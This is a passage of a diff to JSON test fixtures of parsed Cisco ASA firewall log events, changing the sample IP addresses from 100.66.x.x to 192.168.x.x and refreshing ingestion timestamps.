+16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 
@@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095147747Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604956800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095149580Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604962100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, 
@@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095151396Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604967600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095153215Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604971600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095155032Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:32:20.604976100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, 
@@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095156935Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:32:20.604981200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095158782Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:32:20.604985700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095160616Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:32:20.604989300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095162449Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604993500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095164261Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604999Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095166101Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605004500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095167927Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605008100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -17656,8 +17656,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095169742Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.605012300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17703,8 +17703,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095171548Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.605015800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17750,8 +17750,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095173359Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.605020400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17781,8 +17781,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17817,7 +17817,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17828,8 +17828,8 @@
 "severity": 6,
 "duration": 4000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-07-19T09:06:25.095175163Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I",
+ "ingested": "2021-12-09T13:32:20.605025600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:52.000Z",
@@ -17866,8 +17866,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17901,7 +17901,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17910,8 +17910,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095176976Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605029800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -17947,8 +17947,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17982,7 +17982,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17991,8 +17991,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095178945Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605035300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18028,8 +18028,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18063,7 +18063,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18072,8 +18072,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095180795Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605040900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18104,8 +18104,8 @@
 },
 "destination": {
 "port": 8310,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1306,
@@ -18145,7 +18145,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -18153,8 +18153,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095182604Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310",
+ "ingested": "2021-12-09T13:32:20.605046300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -18187,8 +18187,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18223,7 +18223,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18232,8 +18232,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095184438Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)",
+ "ingested": "2021-12-09T13:32:20.605052Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -18249,7 +18249,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.124.24",
+ "mapped_source_ip": "192.168.124.24",
 "connection_id": "11844",
 "source_interface": "outside",
 "mapped_destination_port": 1306
@@ -18271,8 +18271,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18306,7 +18306,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18315,8 +18315,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095186260Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605057400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18352,8 +18352,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18387,7 +18387,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18396,8 +18396,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095188184Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605062800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18433,8 +18433,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18468,7 +18468,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18477,8 +18477,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095190150Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605068300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18514,8 +18514,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18549,7 +18549,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18558,8 +18558,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095191962Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605073700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18595,8 +18595,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18630,7 +18630,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18639,8 +18639,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095193803Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605079100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18676,8 +18676,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18711,7 +18711,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18720,8 +18720,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095195616Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605084400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18757,8 +18757,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18792,7 +18792,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18801,8 +18801,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095197461Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605089800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18838,8 +18838,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18873,7 +18873,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18882,8 +18882,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095199866Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605095300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18919,8 +18919,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18954,7 +18954,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18963,8 +18963,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095201688Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605100800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19000,8 +19000,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19035,7 +19035,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19044,8 +19044,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095203516Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605106300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19081,8 +19081,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19116,7 +19116,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19125,8 +19125,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095205687Z",
